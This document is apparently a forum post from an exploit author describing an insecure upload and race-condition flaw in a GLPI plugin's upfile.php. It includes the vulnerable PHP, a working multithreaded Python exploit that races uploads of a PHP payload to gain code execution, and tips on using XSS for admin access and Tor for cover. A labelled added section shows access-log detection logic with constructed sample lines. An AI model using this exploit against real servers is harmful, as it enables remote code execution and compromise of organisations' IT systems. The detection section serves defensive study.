GLPI is an IT service manager used in companies, government and education organizations. It is a very interesting target and has tons of vulnerabilities, but no interesting code execution in relevant versions, with the exception of CVE-2020-11060, which is very interesting (worth reading), but for some reason I could not reliably replicate it.
After some hours of auditing the source code I, of course, could not find anything; a few hours wouldn't break it. So I turned my attention to the GLPI plugins, which have much smaller code bases and which admins for some reason tend to just trust. I found bugs in multiple of them. I'm going to show an insecure file upload I found that, with the assistance of other vulnerabilities, leads to PHP code execution.
The plugin is Modifications. It is used to modify the login page, home page and menu bar of GLPI 9.x, and it has a very bad implementation of file upload in upfile.php and uplogo.php.
After a bypassable getimagesize check (it only inspects the image header, so a PHP payload placed behind a valid image header passes, and the file extension is never checked):
PHP:
$info = getimagesize($_FILES['photo']['tmp_name']);
...
...
elseif($info === false) {
    $valid_file = false;
    die("Unable to determine image type of uploaded file");
}
PHP:
if($valid_file)
{
    //move it to where we want it to be
    $currentdir = getcwd();
    $target = '../../pics/bg/' . basename($_FILES['photo']['name']);
    //$target = $currentdir .'/uploads/' . basename($_FILES['photo']['name']);
    move_uploaded_file($_FILES['photo']['tmp_name'], $target);
    //move_uploaded_file($_FILES['photo']['tmp_name'], 'uploads'.$new_file_name);
    rename('../../pics/bg/'.basename($_FILES['photo']['name']), '../../pics/bg/back.jpg');
    $message = 'Congratulations! Your file was accepted.';
    header('Location: ../../plugins/mod/config.php ');
    //echo $message;
}
Instead of moving the file from the temporary directory straight to /pics/bg under the fixed name, they trust the client-supplied file name without any checks to build the destination path, and only afterwards rename it to back.jpg. basename() stops the client from choosing the directory, but the file name and extension are entirely under their control. So we can put PHP code inside an image that drops a shell or does whatever, and it is reachable as /pics/bg/<uploaded name>.php in the time frame between the move_uploaded_file($_FILES['photo']['tmp_name'], $target); and rename('../../pics/bg/'.basename($_FILES['photo']['name']), '../../pics/bg/back.jpg'); calls. That can be done by making multiple file uploads in a row and, at the same time, trying to access /pics/bg/uploaded_file.php; eventually you will hit the time frame.
Here is a simple Python implementation:
Python:
# exploit & script by mngl :/
import requests
import re
from threading import Thread, Event
import time

site = 'http://192.168.0.200/glpi/'
cookie = 'glpi_3f946f74140a3178722cb675d5bf6b47=iphkrnce9jpr14327rvf4p3gt1'
file = 'aa.php'        # PHP payload behind a valid image header, so getimagesize() accepts it
csrf_tokens = []       # pool of fresh _glpi_csrf_token values, one is burned per upload
stop_event = Event()
stop_event.clear()
t = 3                  # number of thread groups to launch


def main():
    for n in range(t):
        csrf = Thread(target=get_csrf)
        upload = Thread(target=upload_file)
        test = Thread(target=test_exploit)
        test1 = Thread(target=test_exploit)
        csrf.start()
        time.sleep(t - n)      # give the token fetcher a head start
        upload.start()
        test.start()
        test1.start()


def get_csrf():
    # GLPI wants a fresh CSRF token per POST; scrape them from the plugin config page
    header_csrf = {}
    header_csrf['Cookie'] = cookie
    header_csrf['User-Agent'] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
    header_csrf['Referer'] = site + 'plugins/mod/config.php'
    proxies = {'http': 'http://127.0.0.1:8081'}   # debug proxy, not used by the requests below
    while not stop_event.is_set():
        if len(csrf_tokens) < 6:
            r = requests.get(site + 'plugins/mod/config.php', headers=header_csrf, allow_redirects=True)
            #print(r.text)
            csrf_tokens.append(re.search('[0-9a-z]{32,}', r.text).group())
            #print(csrf_tokens)


def upload_file():
    # keep uploading the payload under its own name so it keeps reappearing as pics/bg/aa.php
    header = {}
    header['User-Agent'] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
    header['Cookie'] = cookie
    header['Referer'] = site + 'plugins/mod/config.php'
    data_ = {
        'submit': 'Send',
    }
    proxies = {'http': 'http://127.0.0.1:8081'}   # debug proxy, not used by the requests below
    while not stop_event.is_set():
        if not csrf_tokens:            # pool empty: wait for get_csrf() instead of crashing on pop()
            time.sleep(0.01)
            continue
        data_['_glpi_csrf_token'] = csrf_tokens.pop(0)
        #print(data_)
        with open(file, 'rb') as image:
            files_ = {'photo': (file, image, 'application/x-php')}
            r = requests.post(site + 'plugins/mod/upfile.php', files=files_, data=data_, headers=header, allow_redirects=False)
        #print(r.request.body)


def test_exploit():
    # hammer the attacker-named path; a 200 means we landed inside the move/rename window
    while not stop_event.is_set():
        #time.sleep(.02)
        e = requests.get(site + 'pics/bg/' + file)
        if e.status_code == 200:
            stop_event.set()
            print('(: pwn :)')
            break
        print(f"{e.status_code} nop")


if __name__ == '__main__':
    main()
. To exploit it you have to have access to an admin account; there are multiple XSS to achieve that.
. The better your connection, the faster it will work, but you can also achieve it routing through slow networks such as Tor and proxychains, and it will only take a few minutes to exploit, although it will make tons of requests that a good admin or a WAF could spot.
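On that last point, here is an added example that is not part of the original post: the detection logic an admin could run over the web server's access log. The pattern is a burst of POSTs to plugins/mod/upfile.php interleaved with GETs for a .php file under /pics/bg/, which no legitimate client ever requests, and a 200 on one of those GETs means the window was hit. The log lines are constructed to mimic the script's traffic (they are not from a real server), and the upload threshold is an arbitrary assumption.

```python
import re
from collections import defaultdict

# Constructed sample lines in Apache combined log format, mimicking one run of
# the exploit from 192.168.0.50 next to normal traffic from two other hosts.
SAMPLE_LOG = """\
192.168.0.50 - - [12/Aug/2020:10:00:01 +0000] "POST /glpi/plugins/mod/upfile.php HTTP/1.1" 302 0 "http://192.168.0.200/glpi/plugins/mod/config.php" "Mozilla/5.0"
192.168.0.50 - - [12/Aug/2020:10:00:01 +0000] "GET /glpi/pics/bg/aa.php HTTP/1.1" 404 196 "-" "python-requests/2.24.0"
192.168.0.50 - - [12/Aug/2020:10:00:01 +0000] "GET /glpi/pics/bg/aa.php HTTP/1.1" 404 196 "-" "python-requests/2.24.0"
192.168.0.50 - - [12/Aug/2020:10:00:02 +0000] "POST /glpi/plugins/mod/upfile.php HTTP/1.1" 302 0 "http://192.168.0.200/glpi/plugins/mod/config.php" "Mozilla/5.0"
192.168.0.50 - - [12/Aug/2020:10:00:02 +0000] "GET /glpi/pics/bg/aa.php HTTP/1.1" 404 196 "-" "python-requests/2.24.0"
192.168.0.50 - - [12/Aug/2020:10:00:02 +0000] "POST /glpi/plugins/mod/upfile.php HTTP/1.1" 302 0 "http://192.168.0.200/glpi/plugins/mod/config.php" "Mozilla/5.0"
192.168.0.50 - - [12/Aug/2020:10:00:02 +0000] "GET /glpi/pics/bg/aa.php HTTP/1.1" 200 0 "-" "python-requests/2.24.0"
10.0.0.7 - - [12/Aug/2020:10:00:03 +0000] "POST /glpi/plugins/mod/upfile.php HTTP/1.1" 302 0 "http://192.168.0.200/glpi/plugins/mod/config.php" "Mozilla/5.0"
10.0.0.7 - - [12/Aug/2020:10:00:05 +0000] "GET /glpi/pics/bg/back.jpg HTTP/1.1" 200 8123 "http://192.168.0.200/glpi/" "Mozilla/5.0"
192.168.0.88 - - [12/Aug/2020:10:00:06 +0000] "GET /glpi/index.php HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
UPLOAD_PATH = "/plugins/mod/upfile.php"
PROBE_RE = re.compile(r"/pics/bg/[^/]+\.php$", re.IGNORECASE)
UPLOAD_THRESHOLD = 3   # POSTs from one IP before it counts as a burst (tunable assumption)


def parse_line(line):
    """Return the fields we need from one access-log line, or None if it does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["path"] = rec["path"].split("?", 1)[0]   # drop any query string
    return rec


def analyse(log_text):
    """Per-IP counters for background uploads and probes of /pics/bg/*.php,
    returning only the IPs that match the exploit pattern, with the reasons."""
    per_ip = defaultdict(lambda: {"uploads": 0, "probes": 0, "probe_hits": 0})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        stats = per_ip[rec["ip"]]
        if rec["method"] == "POST" and rec["path"].endswith(UPLOAD_PATH):
            stats["uploads"] += 1
        elif rec["method"] == "GET" and PROBE_RE.search(rec["path"]):
            stats["probes"] += 1
            if rec["status"] == 200:        # the window was hit: treat the host as compromised
                stats["probe_hits"] += 1

    findings = {}
    for ip, s in per_ip.items():
        reasons = []
        if s["probes"]:
            reasons.append("GET of a .php file under /pics/bg/, which no legitimate client requests")
        if s["uploads"] >= UPLOAD_THRESHOLD:
            reasons.append(f"{s['uploads']} POSTs to upfile.php")
        if reasons:
            findings[ip] = dict(s, reasons=reasons, compromised=s["probe_hits"] > 0)
    return findings


if __name__ == "__main__":
    for ip, finding in analyse(SAMPLE_LOG).items():
        print(ip, finding)
```

A single 404 for /pics/bg/anything.php is already worth an alert on its own, since the only client that asks for that path is one racing the rename; the upload count just tells you how hard they were trying.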
I also have a much faster C++ implementation using libcurl with support for multiple targets.
If for some reason you have any questions, feel free to PM.